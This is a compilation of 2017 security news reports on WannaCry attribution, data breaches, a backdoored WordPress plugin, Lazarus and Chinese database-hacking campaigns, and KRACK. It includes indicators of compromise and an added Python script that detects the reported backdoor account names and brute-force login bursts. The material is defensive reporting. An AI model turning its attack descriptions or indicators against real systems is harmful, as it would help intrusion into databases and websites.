In both WannaCry and NotPetya it looks like the motive was not financial. To me, it is clear that multiple bad actors played a part in the creation and malicious use of the ransomware. The payload and financial portion of the crime appear to be constructed by two different groups of cybercriminals. Remember, the real purpose of ransomware can be a combination of motives, or involve multiple threat actors with different motives. It is always important to step back and think: if this was your crime, how would you have done it? It's crucial to be able to think and look at the world through the eyes of a hacker or cyber-criminal."

Michael Daly, CTO, Raytheon Cybersecurity and Special Missions:

“The message for any company doing business on the internet is that North Korea sees you as a target. So do other rogue nation-states, and so do transnational crime organizations. For them, ransomware is an irresistible crime. It keeps hundreds of millions of dollars in untraceable cryptocurrency flowing in, all the while causing chaos in places like hospitals, power plants, train stations, financial institutions and telecommunications companies.

It's no coincidence the administration announced its findings in a publication they knew would reach the people who have the power and influence to strengthen networks in the commercial sector. Stronger networks are more expensive to attack, and when we increase the cost of cybercrime, we undermine the incentive for the attack.”

Travis Farral, Director of Security Strategy, Anomali:

“Attributing certain attacks or specific malware to an actor, group, or nation-state is difficult in the cyber world. Often, attribution is made as a best-guess based on available evidence. In the case of WannaCry, a handful of prominent security companies noted clues that pointed to the Lazarus Group, a North Korea associated actor group, as the potential culprits behind the malware. The cited links connecting North Korea to WannaCry have been far from conclusive, however. The U.S. Government claims to have evidence indicating that North Korea was indeed behind WannaCry. They may have such evidence, but because they have not shared the details with the public, it is a case of trusting their judgment on the matter.”

Atif Mushtaq, CEO, SlashNext:

“The interesting thing about malware is that, like any other product that works effectively, it can become widely-adopted. We recently blocked an exploit called “EternalBlue” which takes advantage of a Microsoft Windows Security flaw to gain entry using the network file sharing protocol (TCP ports: 139, 445). Similarities, including infection vectors, code sequences, infrastructure and exploitation techniques, link this to the APT called “Unit 180,” as well as a backdoor program called Contopee, originating from Lazarus, a North Korean hacking group. The core malware gets used but each hacking group modifies their attack strategy in order to evade signature- or sandbox-based detection mechanisms.”

Chris Morales, Head of Security Analytics, Vectra:

"Most industry experts believe that North Korea is engaged in finding alternative means for funding their efforts as they have been cut off from traditional financial channels. When WannaCry was first detected, we saw similarities in the code used for that ransomware attack with previous attacks attributed to North Korea, like the Sony hack. North Korea has been targeting banks directly with banking malware while using ransomware against other organizations to acquire a large volume of Bitcoin. North Korea has benefited greatly from the meteoric rise in bitcoin over the past year. With the success in financial gain they have received from cybercrime, we can expect to see more.

We anticipate that many more ransomware attacks will continue to occur. They will have different names and use different exploits. What won’t change is the nature of the attacks and their associated behavior. While we don’t know when the next big attack will occur, enterprises need to be ready for it. Ongoing advances in AI have allowed technology to augment the efforts of cybersecurity teams. And there must be a seismic shift in the cybersecurity industry to identify attacker behaviors fast and early to stop ransomware attacks.”

Eddie Habibi, Founder and CEO, PAS:

“While attribution is an important question to answer, the real question is are we prepared for the next WannaCry? The lifeblood of critical infrastructure plants – where electricity is generated, fuel is produced, and drinking water is cleaned – are industrial control systems. They are responsible for process safety, production uptime, and environmental protection. Attacks on these systems have increased seven-fold since 2010, and the bad guys are achieving greater success with every attack.

Even after WannaCry initially hit, many plants had systems that remained unpatched. Just last week, attackers were successful in taking control of safety systems in a plant with malware called TRITON/TRISIS. They did not need a vulnerability to assert control; they only needed specific process knowledge and an unprepared plant environment.

The threat landscape is fluid, and risk is increasing for critical infrastructure companies. Traditional IT security controls are not keeping pace with the requirements of operational technology systems, and industries need better methods to increase visibility into their most critical cyber assets – eighty percent of which are largely invisible to security personnel today. The basic fact is, you cannot protect what you cannot see.”


Nissan Finance Canada hacked, 1.13 million customers may have been exposed
22.12.2017 securityaffairs Incident

Nissan Finance Canada announced on Thursday that the personal information of 1.13 million customers may have been exposed as a result of a data breach.
Nissan Finance Canada has been hacked, personal information of 1.13 million customers may have been exposed as a result of a data breach discovered by the company on December 11 (The biz took 10 days to disclose the incident).

The company notified customers of the incident via email and confirmed that its systems were compromised, with "unauthorized person(s) gaining access to the personal information of some customers that have financed their vehicles through Nissan Canada Finance or Infiniti Financial Services Canada."

“We apologize for any frustration and anxiety this may cause our customers, and we thank you for your patience and support as we work through this issue.”

Nissan published a quite similar message on its website too, adding that at this time there is no indication that customers who financed vehicles outside of Canada are affected. According to Nissan Canada, compromised data includes customer names, addresses, vehicle makes and models, vehicle identification numbers (VINs), credit scores, loan amounts and monthly payment figures.

Financial information belonging to the customers, such as payment card data, was not affected.

“Nissan Canada Finance (NCF) is notifying its customers in Canada that it is a victim of a data breach that may have involved unauthorized person(s) gaining access to the personal information of some customers that have financed their vehicles through Nissan Canada Finance and INFINITI Financial Services Canada.” states the message published on the company website.

“On December 11, 2017, NCF became aware of unauthorized access to personal information.” “While the precise number of customers affected by the data breach is not yet known, NCF is contacting all of our current and past customers – approximately 1.13 million customers – who have financed their vehicles through Nissan Canada Finance and INFINITI Financial Services Canada.”

Nissan Finance Canada

The company is investigating the attack with the help of law enforcement, trying to determine the extent of the incident and the potential impact on its customers.

“We are still investigating precisely what personal information has been impacted,” the company added.

Nissan is offering 12 months of credit monitoring services through TransUnion at no cost.


Chinese crime group targets database servers for mining cryptocurrency
22.12.2017 securityaffairs CyberCrime

Security researchers discovered multiple hacking campaigns conducted by a Chinese criminal gang targeting database servers.
Researchers from the security firm GuardiCore Labs have discovered multiple hacking campaigns conducted by a Chinese criminal gang targeting database servers. The attackers targeted systems worldwide for mining cryptocurrencies, exfiltrating sensitive data and building a DDoS botnet.
The experts observed thousands of cyber attacks in recent months and identified at least three attack schemes, Hex, Hanako and Taylor, targeting MS SQL and MySQL servers running on both Windows and Linux machines.

“In the last few months GuardiCore Labs has been investigating multiple attack campaigns conducted by an established Chinese crime group that operates worldwide.” reads the analysis published by Guardicore.

“The campaigns are launched from a large coordinated infrastructure and are mostly targeting servers running database services. By now we were able to identify three attack variants – Hex, Hanako and Taylor – targeting different SQL Servers, each with its own goals, scale and target services.”

Chinese hackers database servers

The experts pointed out that the three variants are used for different purposes by the criminal group; the attack scenarios are described below:

Hex installs cryptocurrency miners and remote access trojans (RATs) on infected machines;
Taylor installs a keylogger and a backdoor;
Hanako is used to infect systems and recruit them into a DDoS botnet.

The experts observed threat actors mainly launching Taylor attacks: they recorded hundreds of Hex and Hanako attacks and tens of thousands of Taylor attacks each month.

The vast majority of compromised machines are located in China; other infections were discovered in Thailand, the United States, Japan and elsewhere.

Similarly to the Bondnet botnet, victims are re-purposed to help the attackers, making it impossible to trace the source of the attacks.

The researchers noticed that the attackers used nearly every machine for one month before rotating it out of use. The evidence they collected suggests that the attack group is based in China: the code includes comments in Chinese, the Trojan RAT disguises itself as a popular Chinese program, and configuration files list email addresses from popular Chinese providers.

“Determining the scope of the campaign was quite a challenge. The group has shown an ability to generate over 300 unique binaries per each attack and to constantly rotate their attacking machines and domains, while manipulating thousands of victims as part of their attack infrastructure.” continues the analysis.

The attackers use brute force attacks to gain unauthorized access to the targeted database servers, then run a series of predefined SQL commands to gain persistence and evade audit logs.

The attackers use a network of already compromised systems to power the brute force attacks against the database servers and to deliver the malware; in this way they prevent the takedown of their infrastructure.

All the malware variants create backdoor users in the database and open the Remote Desktop port; with this technique the attackers can remotely download and install their payloads (a cryptocurrency miner, a Remote Access Trojan (RAT) or DDoS malware).
“Later in the attack, the attacker stops or disables a variety of anti-virus and monitoring applications by running shell commands.” continues the post.

“The anti-virus targeted is a mixture of well known products such as Avira and Panda Security and niche software such as Quick Heal and BullGuard. As a final step, the attackers attempt to cover their tracks by deleting any unnecessary registry, file and folder entries using batch files and VB scripts.” the researchers wrote in their blog post published Tuesday.

The attackers cover their tracks by deleting any unnecessary Windows registry, file and folder entries using pre-defined batch files and Visual Basic scripts.

Administrators should check for the existence of the following usernames in their database or systems in order to identify if they have been compromised by the Chinese criminal hackers.

Further info is available in the report, including Indicators of Compromise (IoCs).


After US, also Lithuania bans Kaspersky Software due to its alleged link to the Kremlin
22.12.2017 securityaffairs BigBrothers

Lithuania announced it will ban the products of the cyber security giant Kaspersky from computers in critical infrastructure.
After the US Government's decision to ban Kaspersky software, Lithuania announced it will ban the security giant's products from computers in critical infrastructure (energy, finance and transport).

Lithuania is a member of both the EU and the NATO alliance and is highly critical of Russia, especially after its 2014 annexation of the Crimea peninsula from Ukraine.

“The government… recognised that Kaspersky Lab software is a potential national security threat,” the Lithuanian defence ministry said in a statement.

The government will prohibit agencies responsible for “critical infrastructure” from using Kaspersky products and will force them to replace the anti-virus software in “a short while.”

The Russian security software was banned from US government agencies after US intelligence accused the company of helping Russian intelligence steal top-secret information.

Lithuanian intelligence shares the view of its US counterparts; the Lithuanian intelligence chief Darius Jauniskis recently said Kaspersky “was sometimes acting as a toy in the hands of (Russian President Vladimir) Putin’s administration”.

Kaspersky denied any involvement in cyber espionage activity; the company sued the U.S. Government over the product ban, and its appeal was filed in the U.S. District Court for the District of Columbia.

Kaspersky considers the ban unconstitutional; according to the company, the US Government decided to prohibit its products based on reports citing anonymous sources, without strong evidence of its involvement in cyber espionage activities.

Kaspersky claims to have offered its support to the DHS for its investigation, but the agency issued the 17-01 directive, banning its security software and services without any warning.

Lithuania bans kaspersky

The decision of the US Government is having a significant impact on the company's brand reputation, with a consequent effect on sales in almost every sector and country.

“Through Binding Operational Directive 17-01, DHS has harmed Kaspersky Lab’s reputation, negatively affected the livelihoods of its U.S.-based employees and U.S.-based business partners, and undermined the company’s contributions to the broader cybersecurity community,” said Eugene Kaspersky, CEO and co-founder of Kaspersky Lab.

In December 2016, Lithuania announced it had found Russian spyware on its government computers, and the government blamed Moscow for cyber espionage campaigns.

According to Lithuanian intelligence, Russia powered cyber attacks that hit government networks over the last two years. According to Reuters, the head of cyber security Rimtautas Cerniauskas confirmed the discovery of at least three Russian spyware samples on government computers since 2015.


Apple Admits Deliberately Slowing Older iPhones — Here’s Why
21.12.2017 thehackernews Apple


Why is my iPhone slow?
Do you also ask this question again and again?
Well, the biggest conspiracy theory floating around for years, that Apple deliberately slows down performance on your older iPhones whenever the company is about to launch the next version of its flagship in order to push its sales, is TRUE (at least partially).
Apple has finally admitted that it does indeed intentionally slow down older iPhone models, without notifying its customers, though the company claims the move is not intended to encourage customers to upgrade to newer iPhone models.
Instead, Apple says it is a feature—implemented on the iPhone 6, 6S and SE last year during a software update, and on the iPhone 7 in December with the release of iOS 11.2—to protect older iPhones with aging batteries from shutting down unexpectedly and to prolong their lifespan.
"Last year we released a feature for iPhone 6, iPhone 6s and iPhone SE to smooth out the instantaneous peaks only when needed to prevent the device from unexpectedly shutting down during these conditions," the company said in an official statement to Reuters.
"We've now extended that feature to iPhone 7 with iOS 11.2, and plan to add support for other products in the future."
According to Apple, the issue resides in the iPhone's battery, not in its processor. The performance of the lithium-ion batteries used in iPhones degrades over time, which could result in damage to the device's internal components.

Therefore, Apple intentionally throttles the performance of iPhones that have older batteries, batteries with low charge or that are cold, in an attempt to protect their components.
The above statement by Apple came in response to a blog post published earlier this week by John Poole, developer at the Toronto-based firm Geekbench, who analyzed the performance of the iPhone 6S and iPhone 7 over time.
Poole expected the battery capacity to decrease as the devices age, but processor performance to stay the same. He found that an iOS update rolled out to fix a 'sudden shutdown' issue was to blame for the decreased performance.
"Users expect either full performance or reduced performance with a notification that their phone is in low-power mode," Poole wrote in a blog post published Monday (18th December).
"This fix creates a third, unexpected state. While this state is created to mask a deficiency in battery power, users may believe that the slow down is due to CPU performance, instead of battery performance, which is triggering an Apple introduced CPU slow-down."
Apparently, this latest revelation from Apple sparked an outcry among Apple fans.
Although the company was not playing a bad trick to push the sale of newer iPhone models by slowing older ones, Apple should show a bit more honesty in its relationship with its customers who call themselves Apple fans.


Hidden Backdoor Found In WordPress Captcha Plugin Affects Over 300,000 Sites
21.12.2017 thehackernews Vulnerability

Buying popular plugins with a large user base and using them for effortless malicious campaigns has become a new trend among bad actors.
One such incident happened recently when the renowned developer BestWebSoft sold a popular Captcha WordPress plugin to an undisclosed buyer, who then modified the plugin to download and install a hidden backdoor.
In a blog post published on Tuesday, WordFence security firm revealed why WordPress recently kicked a popular Captcha plugin with more than 300,000 active installations out of its official plugin store.
While reviewing the source code of the Captcha plugin, WordFence folks found a severe backdoor that could allow the plugin author or attackers to remotely gain administrative access to WordPress websites without requiring any authentication.
The plugin was configured to automatically pull an updated "backdoored" version from a remote URL — https[://]simplywordpress[dot]net/captcha/captcha_pro_update.php — after installation from the official WordPress repository, without the site admin's consent.

This backdoor code was designed to create a login session for the attacker, who is the plugin author in this case, with administrative privileges, allowing them to gain access to any of the 300,000 websites (using this plugin) remotely without requiring any authentication.
"This backdoor creates a session with user ID 1 (the default admin user that WordPress creates when you first install it), sets authentication cookies, and then deletes itself," reads the WordFence blog post. "The backdoor installation code is unauthenticated, meaning anyone can trigger it."
Also, the modified code pulled from the remote server is almost identical to the code in legitimate plugin repository, therefore "triggering the same automatic update process removes all file system traces of the backdoor," making it look as if it was never there and helping the attacker avoid detection.

The reason behind adding a backdoor is unclear at this moment, but if someone pays a handsome amount to buy a popular plugin with a large user base, there must be a strong motive behind it.
In similar cases, we have seen how organized cyber gangs acquire popular plugins and applications to stealthily infect their large user base with malware, adware, and spyware.
While figuring out the actual identity of the Captcha plugin buyer, WordFence researchers found that the simplywordpress[dot]net domain serving the backdoor file was registered to someone named "Stacy Wellington" using the email address "scwellington[at]hotmail.co.uk."
Using reverse whois lookup, the researchers found a large number of other domains registered to the same user, including Convert me Popup, Death To Comments, Human Captcha, Smart Recaptcha, and Social Exchange.
What's interesting? All of the above-mentioned domains booked under the user contained the same backdoor code that the WordFence researchers found in Captcha.
WordFence has teamed up with WordPress to patch the affected version of the Captcha plug-in and blocked the author from publishing updates, so website administrators are strongly advised to replace their plugin with the latest official Captcha version 4.4.5.
WordFence has promised to release in-depth technical details on how the backdoor installation and execution works, along with a proof-of-concept exploit after 30 days so that admins get enough time to patch their websites.


Greedy North Korean Hackers Targeting Cryptocurrencies and Point-of-Sale Terminals
21.12.2017 thehackernews BigBrothers

The North Korean hacking group has turned greedy.
Security researchers have uncovered a new widespread malware campaign targeting cryptocurrency users, believed to be originated from Lazarus Group, a state-sponsored hacking group linked to the North Korean government.
Active since 2009, Lazarus Group has been attributed many high profile attacks, including the Sony Pictures hack, the $81 million heist from the Bangladesh Bank, and the latest — WannaCry.
The United States has officially blamed North Korea for the global WannaCry ransomware attack that infected hundreds of thousands of computers across more than 150 countries earlier this year.
In separate news, security experts have blamed Lazarus group for stealing bitcoins worth millions from the South Korean exchange Youbit, forcing it to shut down and file for bankruptcy after losing 17% of its assets.
Researchers from security firm Proofpoint have published a new report, revealing a connection between Lazarus Group and a number of multistage cyber attacks against cryptocurrency users and point-of-sale systems.
"The group has increasingly focused on financially motivated attacks and appears to be capitalizing on both the increasing interest and skyrocketing prices for cryptocurrencies," the researchers said. "The Lazarus Group’s arsenal of tools, implants, and exploits is extensive and under constant development."
After analyzing a large number of spear phishing emails with different attack vectors from multiple spear phishing campaigns, researchers discovered a new PowerShell-based reconnaissance implant from the Lazarus Group arsenal, dubbed PowerRatankba.
The encryption, obfuscation, functionality, decoys, and command-and-control servers used by PowerRatankba closely resemble those of the original Ratankba implant developed by Lazarus Group.
The PowerRatankba implant is being spread using a massive email campaign through the following attack vectors:
Windows executable downloader dubbed PowerSpritz
Malicious Windows Shortcut (LNK) files
Several malicious Microsoft Compiled HTML Help (CHM) files
Multiple JavaScript (JS) downloaders
Macro-based Microsoft Office documents
Backdoored popular cryptocurrency applications hosted on fake websites
PowerRatankba, with at least two variants in the wild, acts as a first-stage malware that delivers a fully-featured backdoor (in this case, Gh0st RAT) only to those targeted companies, organizations, and individuals that have interest in cryptocurrency.
"During our research, we discovered that long-term sandboxing detonations of PowerRatankba not running cryptocurrency related applications were never infected with a Stage2 implant. This may indicate that the PowerRatankba operator(s) were only interested in infecting device owners with an obvious interest in various cryptocurrencies," reads the 38-page-long report [PDF] published by Proofpoint.
Once installed, Gh0st RAT allows cybercriminals to steal credentials for cryptocurrency wallets and exchanges.
It's notable that PowerRatankba and Gh0st RAT don't exploit any zero-day vulnerability; instead, Lazarus Group relies on mixed programming practices, like C&C communication over HTTP, use of the Spritz encryption algorithm and a Base64-encoded custom encryptor.
"It is already well-known that Lazarus Group has targeted and successfully breached several prominent cryptocurrency companies and exchanges," the researchers say. "From these breaches, law enforcement agencies suspect that the group has amassed nearly $100 million worth of cryptocurrencies based on their value today."
Besides stealing cryptocurrencies, the group was also found infecting SoftCamp point-of-sale (POS) terminals, largely deployed in South Korea, using RatankbaPOS malware for stealing credit card data.
Since RatankbaPOS shares the same C&C server as the PowerRatankba implant, it is believed that both implants are linked to Lazarus Group.
The explosive growth in cryptocurrency values has motivated not only traders but also hackers to invest all their time and resources in making digital wealth.
More details about the new malware campaigns run by Lazarus Group can be found in the in-depth report [PDF], titled "North Korea Bitten by Bitcoin Bug—Financially motivated campaigns reveal a new dimension of the Lazarus Group," published by Proofpoint on Wednesday.


Romanian Police Arrest 5 People for Spreading CTB Locker and Cerber Ransomware
21.12.2017 thehackernews Ransomware Crime

Romanian police have arrested five individuals suspected of infecting tens of thousands of computers across Europe and the United States in recent years by spreading two infamous ransomware families—Cerber and CTB Locker.
Under Operation Bakovia, a major global police operation conducted by Europol, the FBI and law enforcement agencies from Romania, the Netherlands and the UK, authorities raided six houses in East Romania and made five arrests, Europol said on Wednesday.
Authorities have seized a significant amount of hard drives, external storage, laptops, cryptocurrency mining devices, numerous documents and hundreds of SIM cards during the raid.
One thing to note is that the five suspects were not arrested for developing or maintaining the infamous ransomware strains, but for allegedly spreading CTB Locker and Cerber.
Based on CryptoLocker, CTB Locker, aka Critroni, was among the most widely spread ransomware families in 2016 and was the first ransomware to use the Tor anonymizing network to hide its command and control servers.
Cerber, which emerged in March 2016, works on a ransomware-as-a-service (RaaS) model that helped it gain widespread distribution, allowing any would-be hacker to spread the malware in exchange for 40% of each ransom amount paid.

While CTB Locker helped criminals make $27 million in ransom, Cerber was ranked by Google as the most criminally profitable ransomware, having earned them $6.9 million up to July 2017.
As with most ransomware, CTB Locker and Cerber distributors were using the most common attack vectors, such as phishing emails and exploit kits.
"In early 2017, the Romanian authorities received detailed information from the Dutch High Tech Crime Unit and other authorities that a group of Romanian nationals was involved in sending spam messages," Europol said in its press release.
"The spam messages intended to infect computer systems and encrypt their data with the CTB-Locker ransomware aka Critroni. Each email had an attachment, often in the form of an archived invoice, which contained a malicious file. Once this attachment was opened on a Windows system, the malware encrypted files on the infected device."
Although the authorities did not release the actual identities of the arrested individuals yet, Europol released a dramatic video of the arrests, where you can see how armed officers stormed the suspects' residence.


Hackers Targeting Servers Running Database Services for Mining Cryptocurrency
21.12.2017 thehackernews Hacking

Security researchers have discovered multiple attack campaigns conducted by an established Chinese criminal group that operates worldwide, targeting database servers for mining cryptocurrencies, exfiltrating sensitive data and building a DDoS botnet.
The researchers from security firm GuardiCore Labs have analyzed thousands of attacks launched in recent months and identified at least three attack variants—Hex, Hanako, and Taylor—targeting different MS SQL and MySQL servers for both Windows and Linux.
The goals of all the three variants are different—Hex installs cryptocurrency miners and remote access trojans (RATs) on infected machines, Taylor installs a keylogger and a backdoor, and Hanako uses infected devices to build a DDoS botnet.
So far, researchers have recorded hundreds of Hex and Hanako attacks and tens of thousands of Taylor attacks each month and found that most compromised machines are based in China, and some in Thailand, the United States, Japan and others.
To gain unauthorized access to the targeted database servers, the attackers use brute force attacks and then run a series of predefined SQL commands to gain persistent access and evade audit logs.
What's interesting? To launch the attacks against database servers and serve malicious files, attackers use a network of already compromised systems, making their attack infrastructure modular and preventing takedown of their malicious activities.

For achieving persistent access to the victim's database, all three variants (Hex, Hanako, and Taylor) create backdoor users in the database and open the Remote Desktop port, allowing attackers to remotely download and install their next stage attack—a cryptocurrency miner, Remote Access Trojan (RAT) or a DDoS bot.
"Later in the attack, the attacker stops or disables a variety of anti-virus and monitoring applications by running shell commands," the researchers wrote in their blog post published Tuesday.
"The anti-virus targeted is a mixture of well-known products such as Avira and Panda Security and niche software such as Quick Heal and BullGuard."
Finally, to cover their tracks, the attackers delete any unnecessary Windows registry, file, and folder entries using pre-defined batch files and Visual Basic scripts.
Administrators should check for the existence of the following usernames in their database or systems in order to identify if they have been compromised by the Chinese criminal hackers.
hanako
kisadminnew1
401hk$
Guest
Huazhongdiguo110
To prevent compromise of your systems, researchers advised administrators to always follow the database hardening guides (provided by both MySQL and Microsoft), rather than relying on a strong database password alone.
"While defending against this type of attacks may sound easy or trivial—'patch your servers and use strong passwords'—we know that 'in real life' things are much more complicated. The best way to minimize your exposure to campaigns targeting databases is to control the machines that have access to the database," the researchers advised.
"Routinely review the list of machines that have access to your databases, keep this list to a minimum and pay special attention to machines that are accessible directly from the internet. Every connection attempt from an IP or domain that does not belong to this list should be blocked and investigated."
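The checks the two GuardiCore write-ups on this page ask administrators to run, as an added Python example that is not GuardiCore's code: it looks for the account names listed above in a database account listing, and it counts failed logins per client host and compares the hosts against an allowlist of machines permitted to reach the database. The allowlist, the failure threshold and the sample rows and log lines are constructed for the example; the "Access denied" line is the shape MySQL writes to its error log for a failed login.

```python
import re
from collections import Counter

# Account names the GuardiCore report above associates with the Hex, Hanako and
# Taylor campaigns. "Guest" exists by default on Windows and, as a database user,
# in every MSSQL database, so a hit on it means "check whether it is enabled and
# what it can reach" rather than "compromised".
SUSPECT_ACCOUNTS = {"hanako", "kisadminnew1", "401hk$", "Guest", "Huazhongdiguo110"}

# Hosts permitted to reach the database tier: an assumed allowlist for the example,
# standing in for the list of machines the report asks you to keep to a minimum.
ALLOWED_HOSTS = {"localhost", "127.0.0.1", "10.0.0.5", "10.0.0.6"}

# Failed-login line in the MySQL error log, e.g.
#   2017-12-19T08:01:02.123456Z 41 [Note] Access denied for user 'root'@'203.0.113.9' (using password: YES)
DENIED_RE = re.compile(r"Access denied for user '(?P<user>[^']*)'@'(?P<host>[^']+)'")


def find_suspect_accounts(accounts):
    """Return the (name, host) rows whose name is on the suspect list, case-insensitively.

    `accounts` is an iterable of (name, host) pairs, as returned by
    SELECT User, Host FROM mysql.user on MySQL; on MSSQL feed it (name, None)
    pairs from SELECT name FROM sys.server_principals.
    """
    wanted = {name.lower() for name in SUSPECT_ACCOUNTS}
    return [(name, host) for name, host in accounts if name.lower() in wanted]


def failed_logins_by_host(log_lines):
    """Count 'Access denied' events per client host across MySQL error-log lines."""
    counts = Counter()
    for line in log_lines:
        match = DENIED_RE.search(line)
        if match:
            counts[match.group("host")] += 1
    return counts


def flag_hosts(counts, allowed=ALLOWED_HOSTS, threshold=10):
    """Map host -> reason for hosts outside the allowlist or at/above the failure threshold.

    A burst of failures from an allowed host is still reported, because the report
    notes the group attacks through machines it has already compromised.
    """
    flagged = {}
    for host, failures in counts.items():
        reasons = []
        if host not in allowed:
            reasons.append("not in allowlist")
        if failures >= threshold:
            reasons.append(f"{failures} failed logins (possible brute force)")
        if reasons:
            flagged[host] = "; ".join(reasons)
    return flagged


# Constructed sample data: a mysql.user listing with two of the reported accounts
# added, and an error-log excerpt with a password-guessing burst from one host.
SAMPLE_ACCOUNTS = [
    ("root", "localhost"),
    ("app", "10.0.0.5"),
    ("hanako", "%"),
    ("kisadminnew1", "%"),
    ("backup", "10.0.0.6"),
]

SAMPLE_LOG = (
    [f"2017-12-19T08:01:{i:02d}.000000Z {40 + i} [Note] Access denied for user "
     "'root'@'203.0.113.9' (using password: YES)" for i in range(12)]
    + ["2017-12-19T08:05:00.000000Z 60 [Note] Access denied for user 'app'@'10.0.0.5' (using password: YES)",
       "2017-12-19T08:06:00.000000Z 61 [Note] Access denied for user 'root'@'198.51.100.7' (using password: NO)",
       "2017-12-19T08:06:01.000000Z 62 [Note] Access denied for user 'root'@'198.51.100.7' (using password: YES)",
       "2017-12-19T08:07:00.000000Z 63 [Warning] Aborted connection 63 to db: 'unconnected' user: 'app' host: '10.0.0.5'"]
)

if __name__ == "__main__":
    for name, host in find_suspect_accounts(SAMPLE_ACCOUNTS):
        print(f"suspect account: '{name}'@'{host}'")
    for host, reason in flag_hosts(failed_logins_by_host(SAMPLE_LOG)).items():
        print(f"host {host}: {reason}")
```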


Keeper Sues Ars Technica Over Reporting on Critical Flaw
21.12.2017 securityweek Vulnerability
Keeper Security has filed a lawsuit against Ars Technica and reporter Dan Goodin over an article covering a serious vulnerability found by a Google researcher in the company’s password manager.

Google Project Zero researcher Tavis Ormandy revealed last week that he had identified a critical vulnerability in the browser extension for the Keeper password manager.

The flaw, very similar to one discovered by the expert just over one year ago in the same application, could have been exploited by hackers to steal passwords stored by the extension if they could convince an authenticated user to access a malicious website.

Keeper Security released a patch within 24 hours of the flaw being reported, and there has been no evidence of exploitation in the wild. The vendor highlighted that the security hole only impacted the browser extension and not the Keeper desktop application.

These types of vulnerabilities are often covered by the media, particularly ones found by Ormandy, who is known for discovering critical, easy-to-exploit weaknesses in popular software. However, Keeper Security does not like the article written by Ars Technica Security Editor Dan Goodin on this story and filed a lawsuit against him and his employer.

Goodin’s initial article, titled “Microsoft is forcing users to install a critically flawed password manager,” claimed the application had a 16-month-old bug, but it was later updated after Keeper clarified that only a version released this month had been impacted. Despite at least two other updates made to the story, Keeper is still not happy with it and has filed a lawsuit in an effort to get the article removed.

In its complaint, Keeper claims the article “was intended to and did cause harm” to the company by making “false and misleading statements.” The suit covers three counts: defamation, violation of the Uniform Deceptive Trade Practices Act, and commercial disparagement.

Keeper, which requested a jury trial, wants Ars and Goodin not only to remove the story, but also to be awarded damages and have legal costs covered.

While some members of the cybersecurity industry have taken Keeper Security’s side, saying that many of Goodin’s stories are sensationalized, most have sided with the reporter and believe the lawsuit will cause more damage to the company than the article. Several people believe it will have a so-called “Streisand effect.”

Response to Keeper Security suing Ars Technica and Dan Goodin


This is not the first time Keeper Security has resorted to legal action over vulnerability disclosures. Back in 2013, it threatened to sue Netherlands-based security firm Fox-IT after it had discovered a critical flaw in one of its products.


Pepperl+Fuchs Ecom Rugged Devices Exposed to KRACK Attacks
21.12.2017 securityweek ICS

Rugged tablets, phones and PDAs made by Ecom Instruments use Wi-Fi components that are vulnerable to a recently disclosed attack method named KRACK.

Ecom Instruments, acquired last year by Germany-based factory automation solutions provider Pepperl+Fuchs, specializes in developing mobile devices designed for use in hazardous areas, including in the chemical and petrochemical, oil and gas exploration, mining, and energy sectors.

According to ICS-CERT and its German counterpart CERT@VDE, several Windows- and Android-based mobile devices from Ecom are affected by the KRACK flaws.

The list of vulnerable products includes the Android-based Tab-Ex 01 tablets, Ex-Handy 09 and 209 phones, and Smart-Ex 01 and 201 smartphones, and the Windows-based Pad-Ex 01 tablets and i.roc Ci70-Ex, CK70A-ATEX, CK71A-ATEX, CN70A-ATEX and CN70E-ATEX PDAs.

ecom mobile devices vulnerable to KRACK attacks

“ecom instruments devices are in theory attackable by replay, decryption and forging of packets,” CERT@VDE said in an advisory. “However, to perform the attack, the attacker must be significantly closer to the ecom device than to the access point. The WPA2 password cannot be compromised using a KRACK attack. Note if WPA-TKIP is used instead of AES-CCMP, an attacker can easily forge and inject packets directly into the WLAN.”

Pepperl+Fuchs and Ecom are working on addressing the vulnerabilities in the impacted Android products. As for the Windows-based devices, users have been advised to apply the patches provided by Microsoft and switch to using AES-CCMP encryption instead of WPA-TKIP.

KRACK, or Key Reinstallation Attack, is the name assigned to a series of vulnerabilities in the WPA2 protocol. The flaws can allow an attacker within range of the targeted device to read information that the user believes is encrypted and, in some cases, even inject and manipulate data.

The vulnerabilities affect millions of devices from tens or possibly hundreds of vendors. Pepperl+Fuchs is not the first industrial solutions provider to inform customers that its products are impacted by KRACK.

Days after the vulnerabilities were disclosed, Cisco, Rockwell Automation and Sierra Wireless admitted that their industrial networking devices had been vulnerable. A few weeks later, Siemens, ABB, Phoenix Contact, Lantronix and Johnson Controls also warned customers.

Experts believe the risk of attacks against the industrial devices themselves is not as big as the risk to systems used by ICS engineers and operators for remote access, such as smartphones, tablets, and network communication devices.


Backdoored Captcha Plugin Hits 300,000 WordPress Sites
21.12.2017 securityweek Hacking
Yet another plugin was removed from the WordPress repository after a backdoor was added to it following a recent update.

Called "Captcha" and featuring 300,000 active installs at the time it was removed, the plugin was found to have changed ownership several months ago. Initially developed and maintained by BestWebSoft, it was owned by an unnamed developer at the time the backdoor was added.

Through an update on December 4, code designed to trigger an automatic update process and download a ZIP file from the simplywordpress[dot]net domain was added to the plugin. The archive would extract and install itself over the copy of the Captcha plugin already running on site.

The ZIP archive contained a file called plugin-update.php, which was found to be the backdoor, along with small changes to the plugin itself. The file would grant the author unauthorized administrative access to the WordPress websites using the plugin.

The backdoor was designed to create a session with user ID 1 (the default admin user WordPress creates at install), to set authentication cookies, and delete itself. Because the backdoor’s installation code was unauthenticated, anyone could trigger it, Wordfence reports.

The ZIP file also changed the update URL, so that the same process that installed the backdoor could be triggered again, this time to remove all traces of the malicious code.

The simplywordpress[.]net domain hosting the ZIP file is registered to a Stacy Wellington (scwellington@hotmail.co.uk), who apparently has registered a large number of other domains as well. One of the domains is unsecuredloans4u[.]co[.]uk, which is linked to Mason Soiza, an individual previously associated with similarly backdoored WordPress plugins.

“[Soiza] has a long history of buying WordPress plugins in order to place cloaked backlinks on his users’ sites. He then uses these backlinks to increase page rank in SERPs (Search Engine Results Pages) since only web crawlers such as Googlebot can read them,” Wordfence explains.

The individual buys plugins and, after a few months, adds the backdoor code to them to create cloaked backlinks to his own loan sites and boost their rankings for various search terms.

simplywordpress[.]net also includes the backdoored plugins Covert me Popup, Death To Comments, Human Captcha, Smart Recaptcha, and Social Exchange.

Looking at the website’s DNS history, Wordfence discovered a previous A-record of 195.154.179.176, which is the current A-record for unsecuredloans4u[.]co[.]uk, Mason Soiza’s domain. The same IP address is also used to host pingloans[.]co[.]uk, a site registered to Serpable Ltd, which is owned by a Charlotte Ann Wellington.

